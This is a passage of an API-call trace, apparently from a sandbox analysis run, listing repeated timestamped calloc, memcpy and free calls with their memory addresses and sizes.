_Size=0x10 | out: _Dst=0x53da38) returned 0x53da38 [0062.765] memcpy (in: _Dst=0x53da48, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53da48) returned 0x53da48 [0062.765] memcpy (in: _Dst=0x53da58, _Src=0x18ee4c, _Size=0x10 | out: _Dst=0x53da58) returned 0x53da58 [0062.765] calloc (_Count=0x21, _Size=0x4) returned 0x53fcc0 [0062.765] memcpy (in: _Dst=0x53fcc0, _Src=0x53d9e8, _Size=0x80 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.766] free (_Block=0x53d9e8) [0062.766] calloc (_Count=0x21, _Size=0x4) returned 0x53fd50 [0062.766] calloc (_Count=0x42, _Size=0x4) returned 0x53fde0 [0062.766] calloc (_Count=0x1, _Size=0x4) returned 0x5313d8 [0062.766] calloc (_Count=0x41, _Size=0x4) returned 0x2060048 [0062.766] memcpy (in: _Dst=0x2060048, _Src=0x5313d8, _Size=0x4 | out: _Dst=0x2060048) returned 0x2060048 [0062.766] free (_Block=0x5313d8) [0062.766] calloc (_Count=0x41, _Size=0x4) returned 0x2060158 [0062.766] memcpy (in: _Dst=0x2060158, _Src=0x2060048, _Size=0x104 | out: _Dst=0x2060158) returned 0x2060158 [0062.766] calloc (_Count=0x20, _Size=0x4) returned 0x53d9e8 [0062.767] memcpy (in: _Dst=0x53d9e8, _Src=0x53d838, _Size=0x80 | out: _Dst=0x53d9e8) returned 0x53d9e8 [0062.767] calloc (_Count=0x43, _Size=0x4) returned 0x2060268 [0062.767] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.767] calloc (_Count=0x3, _Size=0x4) returned 0x5313e8 [0062.767] calloc (_Count=0x21, _Size=0x4) returned 0x53fef0 [0062.767] memcpy (in: _Dst=0x53fef0, _Src=0x53d9e8, _Size=0x80 | out: _Dst=0x53fef0) returned 0x53fef0 [0062.767] free (_Block=0x53d9e8) [0062.767] calloc (_Count=0x41, _Size=0x4) returned 0x2060380 [0062.767] memcpy (in: _Dst=0x2060380, _Src=0x53fef0, _Size=0x84 | out: _Dst=0x2060380) returned 0x2060380 [0062.768] free (_Block=0x53fef0) [0062.768] calloc (_Count=0x2, _Size=0x4) returned 0x53fef0 [0062.768] memcpy (in: _Dst=0x53fef0, _Src=0x5313d8, _Size=0x8 | out: _Dst=0x53fef0) returned 0x53fef0 [0062.768] calloc (_Count=0x3, _Size=0x4) returned 0x53ff00 [0062.768] memcpy (in: _Dst=0x53ff00, _Src=0x5313d8, _Size=0x8 | out: _Dst=0x53ff00) returned 0x53ff00 [0062.768] free (_Block=0x5313d8) [0062.768] free (_Block=0x53fef0) [0062.768] calloc (_Count=0x2, _Size=0x4) returned 0x53fef0 [0062.768] memcpy (in: _Dst=0x53fef0, _Src=0x53ff00, _Size=0x8 | out: _Dst=0x53fef0) returned 0x53fef0 [0062.768] free (_Block=0x53fef0) [0062.768] calloc (_Count=0x22, _Size=0x4) returned 0x53ff18 [0062.768] memcpy (in: _Dst=0x53ff18, _Src=0x53ff00, _Size=0xc | out: _Dst=0x53ff18) returned 0x53ff18 [0062.768] free (_Block=0x53ff00) [0062.768] calloc (_Count=0x41, _Size=0x4) returned 0x2060490 [0062.768] memcpy (in: _Dst=0x2060490, _Src=0x53ff18, _Size=0x88 | out: _Dst=0x2060490) returned 0x2060490 [0062.769] free (_Block=0x53ff18) [0062.769] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.769] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.769] free (_Block=0x5313d8) [0062.769] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.769] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.769] free (_Block=0x5313d8) [0062.769] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.769] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.769] free (_Block=0x5313d8) [0062.769] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.769] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.770] free (_Block=0x5313d8) [0062.770] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.770] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.770] free (_Block=0x5313d8) [0062.770] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.770] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.770] free (_Block=0x5313d8) [0062.770] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.770] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.770] free (_Block=0x5313d8) [0062.770] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.770] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.770] free (_Block=0x5313d8) [0062.770] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.771] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.771] free (_Block=0x5313d8) [0062.771] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.771] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.771] free (_Block=0x5313d8) [0062.771] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.771] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.771] free (_Block=0x5313d8) [0062.771] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.771] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.771] free (_Block=0x5313d8) [0062.771] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.771] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.771] free (_Block=0x5313d8) [0062.772] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.772] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.772] free (_Block=0x5313d8) [0062.772] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.772] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.772] free (_Block=0x5313d8) [0062.772] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.772] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.772] free (_Block=0x5313d8) [0062.772] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.772] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.772] free (_Block=0x5313d8) [0062.772] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.772] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.772] free (_Block=0x5313d8) [0062.773] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.773] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.773] free (_Block=0x5313d8) [0062.773] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.773] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.773] free (_Block=0x5313d8) [0062.773] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.773] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.773] free (_Block=0x5313d8) [0062.773] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.773] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.774] free (_Block=0x5313d8) [0062.774] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.774] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.774] free (_Block=0x5313d8) [0062.774] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.774] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.774] free (_Block=0x5313d8) [0062.774] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.774] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.774] free (_Block=0x5313d8) [0062.774] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.774] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.774] free (_Block=0x5313d8) [0062.774] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.775] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.775] free (_Block=0x5313d8) [0062.775] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.775] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.775] free (_Block=0x5313d8) [0062.775] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.775] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.775] free (_Block=0x5313d8) [0062.775] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.775] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.775] free (_Block=0x5313d8) [0062.775] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.775] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.775] free (_Block=0x5313d8) [0062.776] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.776] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.776] free (_Block=0x5313d8) [0062.776] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.776] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.776] free (_Block=0x5313d8) [0062.776] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.776] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.776] free (_Block=0x5313d8) [0062.776] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.776] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.776] free (_Block=0x5313d8) [0062.776] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.776] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.776] free (_Block=0x5313d8) [0062.776] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.776] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.777] free (_Block=0x5313d8) [0062.777] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.777] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.777] free (_Block=0x5313d8) [0062.777] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.777] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.777] free (_Block=0x5313d8) [0062.777] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.777] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.777] free (_Block=0x5313d8) [0062.777] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.777] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.777] free (_Block=0x5313d8) [0062.777] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.777] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.777] free (_Block=0x5313d8) [0062.777] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.777] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.777] free (_Block=0x5313d8) [0062.777] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.777] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.777] free (_Block=0x5313d8) [0062.777] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.777] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.778] free (_Block=0x5313d8) [0062.778] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.778] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.778] free (_Block=0x5313d8) [0062.778] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.778] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.778] free (_Block=0x5313d8) [0062.778] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.778] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.778] free (_Block=0x5313d8) [0062.778] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.778] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.778] free (_Block=0x5313d8) [0062.778] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.778] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.778] free (_Block=0x5313d8) [0062.778] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.778] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.778] free (_Block=0x5313d8) [0062.778] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.778] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.778] free (_Block=0x5313d8) [0062.778] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.778] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.779] free (_Block=0x5313d8) [0062.779] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.779] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.779] free (_Block=0x5313d8) [0062.779] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.779] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.779] free (_Block=0x5313d8) [0062.779] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.779] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.779] free (_Block=0x5313d8) [0062.779] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.779] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.779] free (_Block=0x5313d8) [0062.779] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.779] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.779] free (_Block=0x5313d8) [0062.779] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.779] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.779] free (_Block=0x5313d8) [0062.779] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0062.779] memcpy (in: _Dst=0x5313d8, _Src=0x2060490, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0062.779] free (_Block=0x5313d8) [0062.779] memcpy (in: _Dst=0x2060048, _Src=0x2060158, _Size=0x80 | out: _Dst=0x2060048) returned 0x2060048 [0062.780] free (_Block=0x2060158) [0062.780] free (_Block=0x2060380) [0062.781] free (_Block=0x2060268) [0062.781] free (_Block=0x2060490) [0062.781] free (_Block=0x5313e8) [0062.781] memcpy (in: _Dst=0x53fd50, _Src=0x53fcc0, _Size=0x80 | out: _Dst=0x53fd50) returned 0x53fd50 [0062.781] memcpy (in: _Dst=0x53fd50, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fd50) returned 0x53fd50 [0062.781] memcpy (in: _Dst=0x53fcc0, _Src=0x2060048, _Size=0x80 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.781] memcpy (in: _Dst=0x53fcc0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fcc0) returned 0x53fcc0 [0062.782] calloc (_Count=0x21, _Size=0x4) returned 0x53fef0 [0062.782] memcpy (in: _Dst=0x53fef0, _Src=0x53fd50, _Size=0x80 | out: _Dst=0x53fef0) returned 0x53fef0 [0062.782] memcpy (in: _Dst=0x53fef0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fef0) returned 0x53fef0 [0062.782] memcpy (in: _Dst=0x53fef0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fef0) returned 0x53fef0 [0062.782] memcpy (in: _Dst=0x53fef0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fef0) returned 0x53fef0 [0062.782] memcpy (in: _Dst=0x53fef0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fef0) returned 0x53fef0 [0062.782] memcpy (in: _Dst=0x53fef0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x53fef0) returned 0x53fef0 [0062.782] calloc (_Count=0x21, _Size=0x4) returned 0x2060158 [0062.782] memcpy (in: _Dst=0x2060158, _Src=0x53fef0, _Size=0x80 | out: _Dst=0x2060158) returned 0x2060158 [0062.782] memcpy (in: _Dst=0x2060158, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060158) returned 0x2060158 [0062.782] calloc (_Count=0x21, _Size=0x4) returned 0x20601e8 [0062.782] memcpy (in: _Dst=0x20601e8, _Src=0x2060158, _Size=0x80 | out: _Dst=0x20601e8) returned 0x20601e8 [0062.782] memcpy (in: _Dst=0x20601e8, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x20601e8) returned 0x20601e8 [0062.782] calloc (_Count=0x21, _Size=0x4) returned 0x2060278 [0062.782] memcpy (in: _Dst=0x2060278, _Src=0x20601e8, _Size=0x80 | out: _Dst=0x2060278) returned 0x2060278 [0062.782] memcpy (in: _Dst=0x2060278, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060278) returned 0x2060278 [0062.782] calloc (_Count=0x21, _Size=0x4) returned 0x2060308 [0062.782] memcpy (in: _Dst=0x2060308, _Src=0x2060278, _Size=0x80 | out: _Dst=0x2060308) returned 0x2060308 [0062.782] memcpy (in: _Dst=0x2060308, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060308) returned 0x2060308 [0062.782] calloc (_Count=0x21, _Size=0x4) returned 0x2060398 [0062.782] memcpy (in: _Dst=0x2060398, _Src=0x2060308, _Size=0x80 | out: _Dst=0x2060398) returned 0x2060398 [0062.782] memcpy (in: _Dst=0x2060398, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060398) returned 0x2060398 [0062.783] calloc (_Count=0x21, _Size=0x4) returned 0x2060428 [0062.783] memcpy (in: _Dst=0x2060428, _Src=0x2060398, _Size=0x80 | out: _Dst=0x2060428) returned 0x2060428 [0062.783] memcpy (in: _Dst=0x2060428, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060428) returned 0x2060428 [0062.783] calloc (_Count=0x21, _Size=0x4) returned 0x20604b8 [0062.783] memcpy (in: _Dst=0x20604b8, _Src=0x2060428, _Size=0x80 | out: _Dst=0x20604b8) returned 0x20604b8 [0062.783] memcpy (in: _Dst=0x20604b8, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x20604b8) returned 0x20604b8 [0062.783] calloc (_Count=0x21, _Size=0x4) returned 0x2060548 [0062.783] memcpy (in: _Dst=0x2060548, _Src=0x20604b8, _Size=0x80 | out: _Dst=0x2060548) returned 0x2060548 [0062.783] memcpy (in: _Dst=0x2060548, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060548) returned 0x2060548 [0062.783] calloc (_Count=0x21, _Size=0x4) returned 0x20605d8 [0062.783] memcpy (in: _Dst=0x20605d8, _Src=0x2060548, _Size=0x80 | out: _Dst=0x20605d8) returned 0x20605d8 [0062.783] memcpy (in: _Dst=0x20605d8, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x20605d8) returned 0x20605d8 [0062.783] calloc (_Count=0x21, _Size=0x4) returned 0x2060668 [0062.783] memcpy (in: _Dst=0x2060668, _Src=0x20605d8, _Size=0x80 | out: _Dst=0x2060668) returned 0x2060668 [0062.783] memcpy (in: _Dst=0x2060668, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060668) returned 0x2060668 [0062.783] calloc (_Count=0x21, _Size=0x4) returned 0x20606f8 [0062.783] memcpy (in: _Dst=0x20606f8, _Src=0x2060668, _Size=0x80 | out: _Dst=0x20606f8) returned 0x20606f8 [0062.783] memcpy (in: _Dst=0x20606f8, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x20606f8) returned 0x20606f8 [0062.783] calloc (_Count=0x21, _Size=0x4) returned 0x2060788 [0062.783] memcpy (in: _Dst=0x2060788, _Src=0x20606f8, _Size=0x80 | out: _Dst=0x2060788) returned 0x2060788 [0062.783] memcpy (in: _Dst=0x2060788, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060788) returned 0x2060788 [0062.783] calloc (_Count=0x21, _Size=0x4) returned 0x2060818 [0062.783] memcpy (in: _Dst=0x2060818, _Src=0x2060788, _Size=0x80 | out: _Dst=0x2060818) returned 0x2060818 [0062.784] memcpy (in: _Dst=0x2060818, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060818) returned 0x2060818 [0062.784] calloc (_Count=0x21, _Size=0x4) returned 0x20608a8 [0062.784] memcpy (in: _Dst=0x20608a8, _Src=0x2060818, _Size=0x80 | out: _Dst=0x20608a8) returned 0x20608a8 [0062.784] memcpy (in: _Dst=0x20608a8, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x20608a8) returned 0x20608a8 [0062.784] calloc (_Count=0x21, _Size=0x4) returned 0x2060950 [0062.784] memcpy (in: _Dst=0x2060950, _Src=0x20608a8, _Size=0x80 | out: _Dst=0x2060950) returned 0x2060950 [0062.784] memcpy (in: _Dst=0x2060950, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060950) returned 0x2060950 [0062.784] calloc (_Count=0x21, _Size=0x4) returned 0x20609e0 [0062.784] memcpy (in: _Dst=0x20609e0, _Src=0x2060950, _Size=0x80 | out: _Dst=0x20609e0) returned 0x20609e0 [0062.784] memcpy (in: _Dst=0x20609e0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x20609e0) returned 0x20609e0 [0062.784] calloc (_Count=0x21, _Size=0x4) returned 0x2060a70 [0062.784] memcpy (in: _Dst=0x2060a70, _Src=0x20609e0, _Size=0x80 | out: _Dst=0x2060a70) returned 0x2060a70 [0062.784] memcpy (in: _Dst=0x2060a70, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060a70) returned 0x2060a70 [0062.784] calloc (_Count=0x21, _Size=0x4) returned 0x2060b00 [0062.785] memcpy (in: _Dst=0x2060b00, _Src=0x2060a70, _Size=0x80 | out: _Dst=0x2060b00) returned 0x2060b00 [0062.785] memcpy (in: _Dst=0x2060b00, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060b00) returned 0x2060b00 [0062.785] calloc (_Count=0x21, _Size=0x4) returned 0x2060b90 [0062.785] memcpy (in: _Dst=0x2060b90, _Src=0x2060b00, _Size=0x80 | out: _Dst=0x2060b90) returned 0x2060b90 [0062.785] memcpy (in: _Dst=0x2060b90, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060b90) returned 0x2060b90 [0062.785] calloc (_Count=0x21, _Size=0x4) returned 0x2060c20 [0062.785] memcpy (in: _Dst=0x2060c20, _Src=0x2060b90, _Size=0x80 | out: _Dst=0x2060c20) returned 0x2060c20 [0062.785] memcpy (in: _Dst=0x2060c20, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060c20) returned 0x2060c20 [0062.785] calloc (_Count=0x21, _Size=0x4) returned 0x2060cb0 [0062.785] memcpy (in: _Dst=0x2060cb0, _Src=0x2060c20, _Size=0x80 | out: _Dst=0x2060cb0) returned 0x2060cb0 [0062.785] memcpy (in: _Dst=0x2060cb0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060cb0) returned 0x2060cb0 [0062.785] calloc (_Count=0x21, _Size=0x4) returned 0x2060d40 [0062.785] memcpy (in: _Dst=0x2060d40, _Src=0x2060cb0, _Size=0x80 | out: _Dst=0x2060d40) returned 0x2060d40 [0062.785] memcpy (in: _Dst=0x2060d40, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060d40) returned 0x2060d40 [0062.785] calloc (_Count=0x21, _Size=0x4) returned 0x2060dd0 [0062.785] memcpy (in: _Dst=0x2060dd0, _Src=0x2060d40, _Size=0x80 | out: _Dst=0x2060dd0) returned 0x2060dd0 [0062.785] memcpy (in: _Dst=0x2060dd0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060dd0) returned 0x2060dd0 [0062.785] calloc (_Count=0x21, _Size=0x4) returned 0x2060e60 [0062.785] memcpy (in: _Dst=0x2060e60, _Src=0x2060dd0, _Size=0x80 | out: _Dst=0x2060e60) returned 0x2060e60 [0062.785] memcpy (in: _Dst=0x2060e60, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060e60) returned 0x2060e60 [0062.785] calloc (_Count=0x21, _Size=0x4) returned 0x2060ef0 [0062.785] memcpy (in: _Dst=0x2060ef0, _Src=0x2060e60, _Size=0x80 | out: _Dst=0x2060ef0) returned 0x2060ef0 [0062.785] memcpy (in: _Dst=0x2060ef0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060ef0) returned 0x2060ef0 [0062.786] calloc (_Count=0x21, _Size=0x4) returned 0x2060f80 [0062.786] memcpy (in: _Dst=0x2060f80, _Src=0x2060ef0, _Size=0x80 | out: _Dst=0x2060f80) returned 0x2060f80 [0062.786] memcpy (in: _Dst=0x2060f80, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2060f80) returned 0x2060f80 [0062.786] calloc (_Count=0x21, _Size=0x4) returned 0x2061010 [0062.786] memcpy (in: _Dst=0x2061010, _Src=0x2060f80, _Size=0x80 | out: _Dst=0x2061010) returned 0x2061010 [0062.786] memcpy (in: _Dst=0x2061010, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2061010) returned 0x2061010 [0062.786] calloc (_Count=0x21, _Size=0x4) returned 0x20610a0 [0062.786] memcpy (in: _Dst=0x20610a0, _Src=0x2061010, _Size=0x80 | out: _Dst=0x20610a0) returned 0x20610a0 [0062.786] memcpy (in: _Dst=0x20610a0, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x20610a0) returned 0x20610a0 [0062.786] calloc (_Count=0x21, _Size=0x4) returned 0x2061130 [0062.786] memcpy (in: _Dst=0x2061130, _Src=0x20610a0, _Size=0x80 | out: _Dst=0x2061130) returned 0x2061130 [0062.786] memcpy (in: _Dst=0x2061130, _Src=0x53fe60, _Size=0x84 | out: _Dst=0x2061130) returned 0x2061130 [0062.786] calloc (_Count=0x21, _Size=0x4) returned 0x20611c0 [0062.786] memcpy (in: 